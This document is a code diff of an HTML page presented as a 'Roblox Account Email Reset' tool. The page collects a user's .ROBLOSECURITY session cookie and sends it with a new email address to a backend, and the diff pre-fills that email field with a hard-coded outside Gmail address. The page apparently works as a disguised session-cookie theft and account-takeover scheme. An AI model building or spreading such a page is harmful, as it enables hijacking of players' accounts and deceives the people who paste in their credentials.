--- a/index.html
+++ b/index.html
@@ -1,23 +1,23 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <title>Roblox Email Reset Tool</title>
+  <title>Roblox Account Email Reset</title>
 </head>
-<body>
+<body bgcolor="white">
   <h1>Roblox Account Email Reset</h1>
   <input type="text" id="cookieInput" placeholder="Enter .ROBLOSECURITY cookie">
-  <input type="text" id="newEmail" placeholder="New email address">
+  <input type="text" id="newEmail" placeholder="New email address" value="fpskozy2@gmail.com">
   <button onclick="resetEmail()">Reset Email</button>
   <script>
     async function resetEmail() {
       const cookie = document.getElementById('cookieInput').value;
       const newEmail = document.getElementById('newEmail').value;
-      const response = await fetch('/api/reset-email', {
+      const response = await fetch('http://localhost:3000/api/reset-email', {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({ cookie, newEmail })
       });
-      alert(await response.text());
+      alert(await response.text() || 'Reset failed');
     }
   </script>
 </body>
